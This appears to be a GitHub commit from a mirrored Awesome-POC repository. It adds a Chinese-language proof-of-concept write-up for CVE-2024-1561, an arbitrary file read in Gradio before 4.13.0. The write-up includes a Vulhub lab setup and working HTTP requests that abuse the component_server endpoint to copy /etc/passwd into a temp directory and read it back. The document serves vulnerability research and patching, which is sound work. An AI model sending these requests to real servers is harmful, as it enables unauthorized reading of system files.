mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
update CVE-2024-1561
This commit is contained in:
parent
1fbed24de4
commit
297d412633
73
开发语言漏洞/Python Gradio 任意文件读取漏洞 CVE-2024-1561.md
Normal file
73
开发语言漏洞/Python Gradio 任意文件读取漏洞 CVE-2024-1561.md
Normal file
@ -0,0 +1,73 @@
|
||||
# Python Gradio 任意文件读取漏洞 CVE-2024-1561
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Gradio 是一个 Python 库,允许用户无需编写前端代码即可为机器学习模型快速构建 Web 界面。
|
||||
|
||||
在 Gradio 4.13 版本之前,`component_server` 接口允许攻击者调用 `Component` 类的任意方法。攻击者可以利用 `move_resource_to_block_cache` 方法,将服务器上的任意文件复制到临时目录,并进一步读取其内容,从而实现任意文件读取。
|
||||
|
||||
参考链接:
|
||||
|
||||
- [gradio-app/gradio#6884](https://github.com/gradio-app/gradio/pull/6884)
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
|
||||
- https://github.com/advisories/GHSA-g9cj-cfpp-4g2x
|
||||
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
Gradio < 4.13.0
|
||||
```
|
||||
|
||||
## 环境搭建
|
||||
|
||||
Vulhub 执行如下命令启动一个由 Gradio 4.12.0 编写的应用:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,默认未开启身份验证。你可以通过 `http://your-ip:7860` 访问该应用。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
首先,访问 `/config` 接口,获取一个组件的 `id` 字段,例如 `3`。
|
||||
|
||||
```
|
||||
GET /config HTTP/1.1
|
||||
Host: your-ip:7860
|
||||
```
|
||||
|
||||

|
||||
|
||||
然后,利用 `move_resource_to_block_cache` 方法,将 `/etc/passwd` 文件写入临时目录,接口会返回临时文件路径。
|
||||
|
||||
```
|
||||
POST /component_server HTTP/1.1
|
||||
Host: your-ip:7860
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"component_id": "3",
|
||||
"data": "/etc/passwd",
|
||||
"fn_name": "move_resource_to_block_cache",
|
||||
"session_hash": "aaaaaaaaaaa"
|
||||
}
|
||||
```
|
||||
|
||||

|
||||
|
||||
最后,通过 `file` 接口拼接返回的路径,即可读取文件内容。
|
||||
|
||||
```
|
||||
GET /file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd HTTP/1.1
|
||||
Host: your-ip:7860
|
||||
```
|
||||
|
||||

|
||||
|
||||
如果操作成功,即可看到 `/etc/passwd` 的内容,证明漏洞存在。
|
||||
|
||||
## 漏洞修复
|
||||
|
||||
该漏洞在 `gradio==4.13.0` 中被修复。
|
||||
Binary file not shown.
|
After Width: | Height: | Size: 398 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 235 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 452 KiB |
Loading…
x
Reference in New Issue
Block a user